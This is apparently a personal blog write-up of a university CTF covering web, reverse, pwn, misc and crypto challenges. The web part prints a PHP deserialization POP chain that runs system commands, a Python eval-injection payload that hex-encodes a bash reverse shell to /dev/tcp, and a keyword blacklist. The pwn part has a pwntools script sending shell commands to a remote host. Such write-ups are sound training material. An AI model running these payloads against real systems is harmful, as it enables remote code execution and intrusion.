浙江工商大学校赛

web

PHP签到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<?php
highlight_file(__FILE__);
ini_get('open_basedir');

class yiyi{
public $Do;
public $You;
public $love;
public $web;
public function __invoke()
{
echo "迈进新手村了,接下来往哪走呢"."<br>";
eval($this->web);
}
public function __wakeup()
{
$this->web=$this->love;
}
public function __destruct()
{
die($this->You->execurise=$this->Do);
}

}

class whoami{
private $execurise;
public $lead;
public $hansome;
public function __set($name,$value)
{
echo $this->lead;
}
public function __get($args)
{
if(is_readable("/flag")){
echo file_get_contents("/flag");
}
else{
echo "签到也不带这么签的啊"."<br>";
if ($this->execurise=="man!") {
echo "胜利就在眼前"."<br>";
if(isset($this->hansome->lover)){
phpinfo();
}
}
else{
echo($this->execurise);
echo "搞什么啊,别犯困"."<br>";
}
}
}
}

class ZJGSU{
public $girl;
public $friend;
public function __toString()
{
return "心中有信仰,脚下有力量"."<br>".$this->girl->abc;
}
public function __call($args1,$args2)
{
$func=$this->friend;
$func();
}

}
class ZJPC{
private $lover;
public $forever;
public function __isset($args){
return $this->forever->nononon();
}

}


$web=$_GET['web'];
if (isset($web)) {
unserialize(base64_decode($web));
throw new Exception("None");
}else{
echo("你真的是学web的么");
}
1
2
3
4
5
6
yiyi->destruct
whoami->set
ZJGSU->tostring
whoami->get
zjpc->isset
yiyi->invoke
1
2
3
4
5
6
7
8
9
10
11
$web=new yiyi();
$web->You=new whoami();
$web->You->lead=new ZJGSU();
$web->You->lead->girl=new whoami();
$web->You->lead->girl->execurise="man!";
$web->You->lead->girl->hansome=new ZJPC();
$web->You->lead->girl->hansome->lover=1;
$web->You->lead->girl->hansome->forever=new ZJGSU();
$web->You->lead->girl->hansome->forever->friend=new yiyi();
$web->You->lead->girl->hansome->forever->friend->love="system('cat /maybe_1_am_flag');";
$web->You->lead->girl->hansome->forever->friend->web="system('ls');";

POP链构造,

calc++

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
def waf(s):
blacklist = ['import','(',')','#','@','^','$',',','>','?','`',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__', '\\x']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag= False
print(no)
break
return flag


@app.route("/")
def index():
"我算啊算 算不到那个天命的女孩..."
return render_template("index.html")

@app.route("/source")
def source():
src = """
@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)

if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"
"""
return src

@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)

if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"

发现eval了我们传入的num值,根据提示给定保姆级教程,我们得到了payload例子

1
[[str][0]for[ᵒs.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x27\x78\x27\x78\x27\x78\x27\x78\x27\x78\x2f\x34\x34\x34\x34\x20\x30\x3e\x26\x31\x3b\x7d']]]

但是发现\x被waf挡住了,所以这里用unicode绕过即可,然后就是shell反弹

RE

逆向的本质

}detacitsihpos_3b_ot_tub_llik_dn@_thg1f_ot_ton_s1_esrever_f0_ecn3sse_ehT{galf

逆向即可

Unpack

魔改的UPX,更改UPX的标志位

IDA得到一个字节组

然后根据算法逆向

1
2
3
4
5
6
7
tmp=[0x6D,0x68,0x64,0x69,0x70,0x51,0x75,0x76,0x54,0x35,0x76,0x51,0x65,0x34,0x71,0x51,0x6F,0x35,0x63,0x68,0x62,0x67,0x70,0x62,0x7F,0x79,0x0,0x0,0xB,0x4,0x5,0x0E]
flag=""
tmp1=""

for i in range(26):
tmp1=tmp[i]^tmp[i%4+28]
print(chr(tmp1),end="")

得到flag

PWN

math_game

简单的PWNTOOL利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context(arch='amd64',os='linux',log_level='debug')

io = remote('124.221.156.93',32936)

io.recvuntil("challenge.\n")
io.sendline("")

data = io.recvuntil(delims=b"=",timeout=5)
data = data[:-1].decode()
data = data.replace('/', '//')
data = data.replace(' ', '')
data = data.replace('\n', '')
print("接受到了",data)
a = eval(data)
print("运算后",a)
io.sendline(str(a))
io.recvuntil("shell...\n")
io.sendline("cat flag")
io.recvall()

Misc

Maze Hunter

跟着顺序一个一个找就行了

密码学

密码是什么?可以拿来吃嘛🤓

1
2
3
4
5
6
7
8
9
10
11
12
13

import base64

symbols = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
flag=["abbaa","bbaab","babba","aabba","aaaba","bbaab","bbabb","bbabb","bbbab","aabba","aaaab","bbabb","bbabb","bbaab","aabab","bbaaa","baaab","babbb","baabb","bbaab","baabb","abbbb","abbbb","aabba","baabb","babba","baaba","babab","bbbbb","bbaab","aabab","bbaaa","baaab","babbb","babaa","bbaaa","aabbb","abbbb","abbbb","aabba","baabb","babba","baaba","bbbba","abbbb","aabba","abbab","bbbab","abbbb","babaa"]

codes = [format(i, '05b').replace('0','a').replace('1','b') for i in range(32)]
print(codes)
enc_map = dict(zip(symbols, codes))
dec_map = {code: sym for sym, code in enc_map.items()}
print(dec_map)
for i in flag:
print(dec_map[i],end="")

五个字符一组,根据解密map得到base32字符串,解密即可


浙江工商大学校赛
https://lvyzcc.github.io/2025/05/15/校赛/
作者
LvYz
发布于
2025年5月15日
许可协议